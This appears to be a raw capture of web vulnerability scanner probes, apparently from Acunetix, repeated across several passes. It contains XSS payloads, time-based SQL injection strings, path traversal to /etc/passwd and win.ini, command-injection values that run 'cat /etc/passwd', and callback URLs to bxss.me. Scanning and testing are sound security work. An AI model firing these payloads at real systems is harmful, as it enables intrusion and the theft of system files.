1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(953078)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(971724)>

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

-1

1<ScRiPt%20>prompt(979795)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

${100275+99498}

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

1

-1)

|cat /etc/passwd#

1

1

1&n930711=v934062

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

\xf6<img acu onmouseover=prompt(901592) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

)

1

1

vbkEFXp4'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

1<input autofocus onfocus=prompt(955673)>

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1AXgpM8G')

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()

27N6g26E'))

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

-1

1

'

[url=http://www.acunetix.com]website security[/url]

1

1

"

/etc/passwd

1

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1_YGO7n <ScRiPt >prompt(929584)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

1

1

1

1

1

http://hitDtGsdfpANT.bxss.me/

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

0k9hDrAI'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

UpPK2gqT')

1

comments

http://www.acunetix.tst

1

1

&dir

1

1

comments

'"

ldezqmoZ'))

'&dir&'

1'"()&%<ScRiPt >prompt(938257)</ScRiPt>

1

1

1

comments/.

"&dir&"

<!--

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(950243)</ScRiPt>

1

1

|dir

1

1_918312

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

1

"|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

acu10335\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10335

1

1

1

acux6645\xc0\xbez1\xc0\xbcz2a\x90bcxuca6645

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(934886)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(915607)</script>

1

1

1

1<ScRiPt >prompt(943478)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996450></ScRiPt>

1

1

1<ScRiPt >prompt(964257)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(978152)">

1

1

1

response.write(9160718*9644471)

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993949)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(949834))>

'+response.write(9160718*9644471)+'

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"+response.write(9160718*9644471)+"

1

1<iframe src='data:text/html

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

WEB-INF\web.xml

1<body onload=prompt(954502)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997742)>

${99278+99607}

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

1

1<img src=xyz OnErRor=prompt(928422)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

1

1&n951016=v931999

1<img/src=">" onerror=alert(986505)>

)

-1)

1<ScRiPt%20>prompt(982324)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1&lt

!(()&&!|*|*|

1

'|'ld

1

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(985621) //\xf6>

1

1

1

GaCCRyNF'

^(#$!@#$)(()))******

1

"|"ld

'

1<input autofocus onfocus=prompt(915151)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

HNaDtomL')

"

1

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

3VXjagn9'))

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hit1UMUFueu7S.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1_onsA5 <ScRiPt >prompt(910845)</ScRiPt>

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

&dir

1

1

-1))

1

'"

http://www.acunetix.tst

comments

1

1

'&dir&'

1

<!--

comments/.

file:///etc/passwd

1

ATfaX8Ze'

"&dir&"

1'"()&%<ScRiPt >prompt(977368)</ScRiPt>

1

1

1

1

NB8o008a')

'"()&%<ScRiPt >prompt(952020)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

nZ6mZm46'))

1

1

'|dir

1

WEB-INF/web.xml

1

1_951664

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu7346\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7346

1

................windowswin.ini

acux2855\xc0\xbez1\xc0\xbcz2a\x90bcxuca2855

1

1

1<ScRiPt >prompt(941830)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(999540)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(956477)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9661604*9940313)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913531></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9661604*9940313)+'

1

1

1

1<ScRiPt >prompt(914686)</ScRiPt>

"+response.write(9661604*9940313)+"

1

WEB-INF/web.xml

1

1

1<video><source onerror="javascript:prompt(942316)">

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979826)"></g></svg>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(985229))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<body onload=prompt(972118)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

1

1

${99022+99137}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900016)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

1<img src=xyz OnErRor=prompt(920985)>

`cat /etc/passwd`

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1<img/src=">" onerror=alert(921916)>

1

|cat /etc/passwd#

1&n910959=v963562

)

1<ScRiPt%20>prompt(937626)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

'"()

!(()&&!|*|*|

'|'ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

testasp.vulnweb.com

"|"ld

1

1

^(#$!@#$)(()))******

1QMsEv92'

1

/etc/passwd

1

\xf6<img acu onmouseover=prompt(959435) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(914643)>

vKj51AWD')

'

1

'

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

LZN3rNR7'))

"

<a href='http://www.acunetix.com'>website security</a>

"

acunetix_wvs_invalid_filename

1

http://hit3pnlUqvcuu.bxss.me/

1

||cat /etc/passwd

-1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1_ql2eA <ScRiPt >prompt(968978)</ScRiPt>

-1)

http://www.acunetix.tst

1

'"

comments

1

1

'&dir&'

1

1

-1))

<!--

file:///etc/passwd

"&dir&"

1

1

1'"()&%<ScRiPt >prompt(998689)</ScRiPt>

comments/.

1

1

7dTETmhp'

1

1

'"()&%<ScRiPt >prompt(937351)</ScRiPt>

1

1

|dir

1

b856jhhy')

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

1_903095

HbH00ACo'))

WEB-INF/web.xml

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu6895\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6895

1

1

acux2508\xc0\xbez1\xc0\xbcz2a\x90bcxuca2508

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(933475)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(903975)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(913447)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953922></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(978588)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(924038)">

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964443)"></g></svg>

response.write(9084711*9655154)

1

1

1

'+response.write(9084711*9655154)+'

1<div style=width:expression(prompt(986132))>

1

&cat /etc/passwd&

1

1

1

1<iframe src='data:text/html

"+response.write(9084711*9655154)+"

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(955894)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975225)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(912944)>

`cat /etc/passwd`

1

1

1

-1)

${100083+100376}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(946506)>

1

-1))

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

S4f8Gr1i'

1<ScRiPt%20>prompt(926492)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n980408=v944861

1some_inexistent_file_with_long_name%00.jpg

)

1

1

1&lt

WT5xZb7h')

'|'ld

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

gnweZJVD'))

\xf6<img acu onmouseover=prompt(981606) //\xf6>

1

'"()

testasp.vulnweb.com

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(906509)>

1

-1

/etc/passwd

1

'

'

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_aIga6 <ScRiPt >prompt(964504)</ScRiPt>

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

acunetix_wvs_invalid_filename

http://hitLVc0jAT8py.bxss.me/

&dir

1

1

${@print(md5(acunetix_wvs_security_test))}\

LTV3I0MO'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

'&dir&'

1

comments

C5BkyK3E')

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

'"

1'"()&%<ScRiPt >prompt(970317)</ScRiPt>

xWAv3IzN'))

comments/.

1

<!--

"&dir&"

WEB-INF/web.xml

1

1

1

1

'"()&%<ScRiPt >prompt(972892)</ScRiPt>

1

1

1

WEB-INF\web.xml

|dir

1

1

1_932414

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu2997\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2997

1

acux1802\xc0\xbez1\xc0\xbcz2a\x90bcxuca1802

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(919982)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(935452)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(936948)</ScRiPt>

response.write(9122614*9135200)

1

1

1

'+response.write(9122614*9135200)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929781></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(916103)</ScRiPt>

"+response.write(9122614*9135200)+"

WEB-INF/web.xml

1

1

1

1<video><source onerror="javascript:prompt(973037)">

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974416)"></g></svg>

1

1

1

../../../../../../../../../../etc/passwd

1

1

1

1<div style=width:expression(prompt(905421))>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

${99186+99823}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

cat /etc/passwd

1

1<iframe src='data:text/html

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1&n967881=v998125

`cat /etc/passwd`

1<body onload=prompt(937200)>

)

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987615)>

1

1

-1)

!(()&&!|*|*|

testasp.vulnweb.com

'|'ld

1

1<img src=xyz OnErRor=prompt(941693)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

1

^(#$!@#$)(()))******

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(949839)>

'

1

"|"ld

1

NdEFVriF'

1

1

1<ScRiPt%20>prompt(956990)</sCripT>

"

X942mjly')

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1&lt

1

1

yg1UR9Ti'))

${@print(md5(acunetix_wvs_security_test))}\

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1

\xf6<img acu onmouseover=prompt(998403) //\xf6>

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

http://hitv5ifEZodeS.bxss.me/

1

1<input autofocus onfocus=prompt(936290)>

-1)

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

Yn92dUKD'

'&dir&'

[url=http://www.acunetix.com]website security[/url]

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(967303)</ScRiPt>

"&dir&"

1_e2zAB <ScRiPt >prompt(931500)</ScRiPt>

1

comments/.

Q4wjTLfG')

1

'"()&%<ScRiPt >prompt(906603)</ScRiPt>

<!--

|dir

1

file:///etc/passwd

XxVWOBbE'))

1

1

1

1

1_986424

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"|dir

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu7204\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7204

1

1

acux1023\xc0\xbez1\xc0\xbcz2a\x90bcxuca1023

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(912053)</ScRiPt>

1

1

1

1<script>prompt(937378)</script>

1